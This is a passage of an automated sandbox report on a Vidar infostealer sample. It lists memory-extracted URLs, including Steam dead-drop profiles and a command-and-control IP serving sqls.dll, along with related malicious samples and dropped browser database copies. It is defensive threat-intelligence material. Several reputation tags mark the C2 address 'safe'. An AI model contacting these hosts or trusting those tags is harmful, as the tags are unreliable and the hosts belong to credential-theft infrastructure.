                https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.jsRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=HCFIJK.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPKRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&ampRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.ecosia.org/newtab/HCFIJK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brIEHCAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://78.47.123.174;RegAsm.exe, 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYtIEHCAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaRegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/about/76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/headeRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://78.47.123.174HCAFRegAsm.exe, 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&l=englisRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=HCFIJK.2.drfalse
                • URL Reputation: safe
                		unknown
                http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgRegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&ampRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchHCFIJK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://steamcommunity.com/profiles/76561199689717899/badgesRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.2472411920.000000001921D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2468847118.000000001326F000.00000004.00000020.00020000.00000000.sdmp, sqls[1].dll.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&l=englRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&l=76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/profiles/76561199689717899/inventory/RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&l=enRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.google.com/images/branding/product/ico/googleg_lodp.icoHCFIJK.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&l=english&amRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOITRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&l=engliRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://store.steampowered.com/76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&ampRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://ac.ecosia.org/autocomplete?q=HCFIJK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgRegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • URL Reputation: safe
                		unknown
                https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&l=engliRegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3RegAsm.exe, 00000002.00000002.2467689392.00000000010E6000.00000004.00000020.00020000.00000000.sdmp, FIEHII.2.drfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174/sqls.dllbRegAsm.exe, 00000002.00000002.2467689392.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://78.47.123.174DBKERegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://store.steampowered.com/account/cookiepreferences/RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://store.steampowered.com/mobileRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.2.drfalse
                • URL Reputation: safe
                		unknown
                https://support.mozilla.orgIEHCAK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/76561199689717899[1].htm.2.drtrue
                • Avira URL Cloud: safe
                		unknown
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=HCFIJK.2.drfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/login/hoRegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://steamcommunity.com/login/home/?goto=profiles%2F7656119968971789976561199689717899[1].htm.2.drfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                78.47.123.174
                		unknownGermany
                		24940HETZNER-ASDEfalse
                23.197.127.21
                		steamcommunity.comUnited States
                		20940AKAMAI-ASN1EUtrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1445903
                Start date and time:2024-05-22 18:27:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 7m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:10
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:file.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@8/26@1/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 95
                • Number of non-executed functions: 241
                Cookbook Comments:
                • Found application associated with file extension: .exe

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: file.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                12:28:03API Interceptor1x Sleep call for process: RegAsm.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                78.47.123.174file.exeGet hashmaliciousVidarBrowse
                  file.exeGet hashmaliciousVidarBrowse
                    file.exeGet hashmaliciousVidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                          23.197.127.21file.exeGet hashmaliciousVidarBrowse
                            file.exeGet hashmaliciousVidarBrowse
                              https://store-steampowered-com.glitch.me/Get hashmaliciousUnknownBrowse
                                Advanced_IP_Scanner_2.5.4594.1 (1).exeGet hashmaliciousUnknownBrowse

                                  Domains

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 92.122.104.90
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.192.247.89
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.67.133.187
                                  5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  3108_FreeDownloadFiles.zipGet hashmaliciousPureLog Stealer, VidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 104.102.42.29

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  HETZNER-ASDEwhat dmv forms do i need to sell my car in ny 88970.jsGet hashmaliciousGookitLoaderBrowse
                                  • 136.243.58.194
                                  http://ct.ke/STUDENTS-FREE-LAPT0PSGet hashmaliciousUnknownBrowse
                                  • 148.251.133.229
                                  New Order.exeGet hashmaliciousUnknownBrowse
                                  • 88.99.137.18
                                  New Order.exeGet hashmaliciousUnknownBrowse
                                  • 88.99.137.18
                                  http://adsbymediavine.comGet hashmaliciousUnknownBrowse
                                  • 148.251.217.242
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 159.69.69.102
                                  bR9Ri9cFkm.elfGet hashmaliciousUnknownBrowse
                                  • 95.217.252.220
                                  Swift_USD103,700.exeGet hashmaliciousFormBookBrowse
                                  • 213.133.100.254
                                  Maersk-BL-Ref0929339041333 47367282378722.scrGet hashmaliciousAgentTeslaBrowse
                                  • 213.133.101.82
                                  AKAMAI-ASN1EUhttps://cs-server-s2s.yellowblue.io/sync-iframeGet hashmaliciousUnknownBrowse
                                  • 23.197.120.249
                                  http://adsbymediavine.comGet hashmaliciousUnknownBrowse
                                  • 104.97.15.51
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  MDE_File_Sample_6730f38a2cc3af5580532de53ea1d08e89e88e48.zipGet hashmaliciousUnknownBrowse
                                  • 23.43.61.160
                                  https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVrGet hashmaliciousUnknownBrowse
                                  • 104.126.37.177
                                  http://sallywilliamson.comGet hashmaliciousUnknownBrowse
                                  • 184.86.103.210
                                  https://innate-acidic-slip.glitch.me/public/zn0u.htm?/NATWESTB.ANKCR.CARD/info.htmGet hashmaliciousUnknownBrowse
                                  • 23.45.239.27
                                  ATTN EFT_Wire 63708 Transfer Receipt.docxGet hashmaliciousUnknownBrowse
                                  • 104.126.37.152
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.67.133.187
                                  http://selliliar.liveGet hashmaliciousUnknownBrowse
                                  • 2.16.238.13

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 78.47.123.174
                                  5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                  • 78.47.123.174
                                  7mDq6gvYVH.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  7mDq6gvYVH.exeGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  perl530.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  perl530.dll.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 78.47.123.174
                                  37f463bf4616ecd445d4a1937da06e19UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                                  • 23.197.127.21
                                  UPazTgVGA7.dllGet hashmaliciousUnknownBrowse
                                  • 23.197.127.21
                                  FRA.0038253.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  Factura_pdf.exeGet hashmaliciousGuLoaderBrowse
                                  • 23.197.127.21
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 23.197.127.21
                                  Zahlungsbest#U00e4tigung und Rechnung_pdf.batGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  waybillDoc_20052024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  101764ZAM2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 23.197.127.21
                                  Twrchtrywth.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                  • 23.197.127.21
                                  SKIIP 83EC125T1 22-0-05-24RQ.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                  • 23.197.127.21

                                  Dropped Files

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  C:\ProgramData\DBFCBGCGIJKJ\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                    file.exeGet hashmaliciousVidarBrowse
                                      file.exeGet hashmaliciousVidarBrowse
                                        5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                          66AF3M5zgO.exeGet hashmaliciousVidarBrowse
                                            sSX92EpKXA.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                              file.exeGet hashmaliciousVidarBrowse
                                                tTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                  l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                    7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                      C:\ProgramData\DBFCBGCGIJKJ\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                        file.exeGet hashmaliciousVidarBrowse
                                                          file.exeGet hashmaliciousVidarBrowse
                                                            5C8BGNPCno.exeGet hashmaliciousCryptOne, VidarBrowse
                                                              66AF3M5zgO.exeGet hashmaliciousVidarBrowse
                                                                sSX92EpKXA.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                    tTcrJ0HtoJ.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                      l2XteV3M4u.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                        7067B48pY6.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                          Created / dropped Files

                                                                          C:\ProgramData\DBFCBGCGIJKJ\AKJDGI

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.1239949490932863
                                                                          Encrypted:false
                                                                          SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                          MD5:271D5F995996735B01672CF227C81C17
                                                                          SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                          SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                          SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\EGIDHD

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.6732424250451717
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
